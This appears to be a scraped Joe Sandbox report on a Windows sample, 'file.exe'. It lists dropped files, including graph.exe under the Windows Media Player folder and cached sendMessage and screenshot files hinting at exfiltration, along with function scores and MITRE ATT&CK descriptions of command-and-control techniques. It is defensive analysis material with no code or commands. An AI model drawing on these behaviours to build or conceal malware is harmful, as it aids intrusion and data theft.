Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

C:\Program Files\Windows Media Player\graph\graph.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\sendMessage[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
file.exe

Function 00007FF7ABC13CE0 Relevance: 53.4, APIs: 19, Strings: 11, Instructions: 876
networkfileCOMMON

Function 00007FF7ABC14D20 Relevance: 40.7, APIs: 15, Strings: 8, Instructions: 446
networkfileCOMMON

Function 00007FF7ABC06190 Relevance: 38.9, APIs: 12, Strings: 10, Instructions: 360
networkfileCOMMON

Function 00007FF7ABC08A90 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 144
COMMON

Function 00007FF7ABC3E440 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Function 00007FF7ABC05D60 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 265
sleepprocessCOMMON

Function 00007FF7ABC09030 Relevance: 15.2, Strings: 12, Instructions: 199
COMMON

Function 00007FF7ABC5D2C8 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMON

Function 00007FF7ABC5E170 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Function 00007FF7ABC13A10 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 169
registryCOMMON

Function 00007FF7ABC17970 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 121
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre